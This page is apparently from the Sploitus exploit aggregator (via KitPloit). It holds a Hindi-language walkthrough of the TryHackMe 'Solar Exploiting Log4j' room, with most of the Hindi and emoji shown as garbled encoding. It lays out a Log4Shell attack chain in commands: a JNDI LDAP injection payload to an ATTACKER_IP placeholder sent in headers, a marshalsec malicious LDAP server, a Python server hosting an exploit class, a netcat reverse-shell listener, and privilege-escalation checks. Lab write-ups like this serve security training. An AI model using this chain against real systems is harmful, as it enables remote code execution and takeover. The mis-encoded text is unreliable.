Sploitus

Solar-exploiting-log-4j

kitploit ┬╖ 2026-09-02

Exploit Code

MARKDOWN178 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LATHIKA-3006-SOLAR-EXPLOITING-LOG-4J
# ЁЯФе Solar Exploiting Log4j - TryHackMe рд╡реЙрдХрдереНрд░реВ

## ЁЯУМ рд░реВрдо: Solar Exploiting Log4j

рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо: TryHackMe рдХрдард┐рдирд╛рдИ: рдордзреНрдпрдо рд╡рд┐рд╖рдп: Log4Shell (Log4j рднреЗрджреНрдпрддрд╛)

* * *

## ЁЯза рдЙрджреНрджреЗрд╢реНрдп

Log4j рднреЗрджреНрдпрддрд╛ (CVE-2021-44228) рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛рдХрд░ рд░рд┐рдореЛрдЯ рдХреЛрдб рдПрдХреНрд╕реАрдХреНрдпреВрд╢рди рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ рдФрд░ рдлрд╝реНрд▓реИрдЧ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВред

* * *

## ЁЯЫая╕П рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЧрдП рдЙрдкрдХрд░рдг

  * Nmap
  * Burp Suite
  * cURL
  * Netcat
  * Python HTTP Server



* * *

## ЁЯМР рдЪрд░рдг 1: рдЯреЛрд╣реА

### ЁЯФН рд▓рдХреНрд╖реНрдп рд╕реНрдХреИрди рдХрд░реЗрдВ

root@kitploit:~
    
    
    nmap -sC -sV <TARGET_IP>
    

### ЁЯУМ рдирд┐рд╖реНрдХрд░реНрд╖

  * рдЦреБрд▓реЗ рдкреЛрд░реНрдЯ: 80 (HTTP), рдЕрдиреНрдп рд░реВрдо рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддреЗ рд╣реИрдВ
  * рд╡реЗрдм рдПрдкреНрд▓рд┐рдХреЗрд╢рди Java-рдЖрдзрд╛рд░рд┐рдд рдмреИрдХрдПрдВрдб рдкрд░ рдЪрд▓ рд░рд╣рд╛ рд╣реИ



* * *

## ЁЯМР рдЪрд░рдг 2: рд╡реЗрдм рдПрдиреНрдпреВрдорд░реЗрд╢рди

  * рд╡реЗрдм рдРрдк рдХреЛ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдореЗрдВ рдЦреЛрд▓реЗрдВ
  * рдЗрдирдкреБрдЯреНрд╕ (рд▓реЙрдЧрд┐рди/рд╕рд░реНрдЪ/рд╣реЗрдбрд░ рдлрд╝реАрд▓реНрдб) рдХреЗ рд╕рд╛рде рдЗрдВрдЯрд░реИрдХреНрдЯ рдХрд░реЗрдВ
  * Burp Suite рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд░рд┐рдХреНрд╡реЗрд╕реНрдЯ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВ



* * *

## ЁЯТе рдЪрд░рдг 3: Log4j рднреЗрджреНрдпрддрд╛ рдХреА рдкрд╣рдЪрд╛рди рдХрд░реЗрдВ

Log4j рднреЗрджреНрдпрддрд╛ JNDI рдЗрдВрдЬреЗрдХреНрд╢рди рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИ:

root@kitploit:~
    
    
    ${jndi:ldap://<ATTACKER_IP>:1389/a}
    

рдпрджрд┐ рдЗрдирдкреБрдЯ рд▓реЙрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ тЖТ рднреЗрджреНрдпрддрд╛ рдореМрдЬреВрдж рд╣реИред

* * *

## тЪЩя╕П рдЪрд░рдг 4: рд▓рд┐рд╕рдирд░ рд╕реЗрдЯ рдХрд░реЗрдВ

### Netcat рдкреНрд░рд╛рд░рдВрдн рдХрд░реЗрдВ

root@kitploit:~
    
    
    nc -lvnp 4444
    

### рдореИрд▓рд┐рд╢рд┐рдпрд╕ LDAP рд╕рд░реНрд╡рд░ рдкреНрд░рд╛рд░рдВрдн рдХрд░реЗрдВ (рдЙрджрд╛рд╣рд░рдг)

root@kitploit:~
    
    
    git clone https://github.com/mbechler/marshalsec
    cd marshalsec
    mvn clean package
    

LDAP рд╕рд░реНрд╡рд░ рдЪрд▓рд╛рдПрдБ:

root@kitploit:~
    
    
    java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
    

* * *

## ЁЯУб рдЪрд░рдг 5: рдкреЗрд▓реЛрдб рд╣реЛрд╕реНрдЯ рдХрд░реЗрдВ

root@kitploit:~
    
    
    python3 -m http.server 8000
    

рдореИрд▓рд┐рд╢рд┐рдпрд╕ Java рдХреНрд▓рд╛рд╕ (Exploit.class) рдмрдирд╛рдПрдБ

* * *

## ЁЯЪА рдЪрд░рдг 6: рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдЯреНрд░рд┐рдЧрд░ рдХрд░реЗрдВ

рдкреЗрд▓реЛрдб рдХреЛ рднреЗрджреНрдп рдлрд╝реАрд▓реНрдб рдореЗрдВ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░реЗрдВ:

root@kitploit:~
    
    
    ${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
    

ЁЯТб рдЗрди рд╣реЗрдбрд░реНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:

  * User-Agent
  * X-Api-Version



* * *

## ЁЯЦея╕П рдЪрд░рдг 7: рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ

рдЯреНрд░рд┐рдЧрд░ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж:

  * рдЯрд╛рд░рдЧреЗрдЯ Netcat рд▓рд┐рд╕рдирд░ рд╕реЗ рд╡рд╛рдкрд╕ рдХрдиреЗрдХреНрдЯ рдХрд░рддрд╛ рд╣реИ
  * рдЖрдкрдХреЛ рд╢реЗрд▓ рдПрдХреНрд╕реЗрд╕ рдорд┐рд▓рддрд╛ рд╣реИ



* * *

## ЁЯФР рдЪрд░рдг 8: рдкреНрд░рд┐рд╡рд┐рд▓реЗрдЬ рдПрд╕реНрдХреЗрд▓реЗрд╢рди (рдпрджрд┐ рдЖрд╡рд╢реНрдпрдХ рд╣реЛ)

рдЬрд╛рдБрдЪреЗрдВ:

root@kitploit:~
    
    
    sudo -l
    

рдЗрдирдХреА рддрд▓рд╛рд╢ рдХрд░реЗрдВ:

  * рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХреА рдЧрдИ SUID рдмрд╛рдЗрдирд░реА
  * рд▓рд┐рдЦрдиреЗ рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓реЗрдВ
  * рдХреНрд░реЙрди рдЬреЙрдмреНрд╕



* * *

## ЁЯЪй рдЪрд░рдг 9: рдлрд╝реНрд▓реИрдЧ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВ

root@kitploit:~
    
    
    find / -name flag.txt 2>/dev/null
    cat flag.txt
    

## ЁЯз╛ рдореБрдЦреНрдп рдЕрд╡рдзрд╛рд░рдгрд╛рдПрдБ рд╕реАрдЦреАрдВ

  * Log4Shell (CVE-2021-44228)
  * JNDI рдЗрдВрдЬреЗрдХреНрд╢рди
  * рд░рд┐рдореЛрдЯ рдХреЛрдб рдПрдХреНрд╕реАрдХреНрдпреВрд╢рди (RCE)
  * рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓
  * рд╡реЗрдм рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯреЗрд╢рди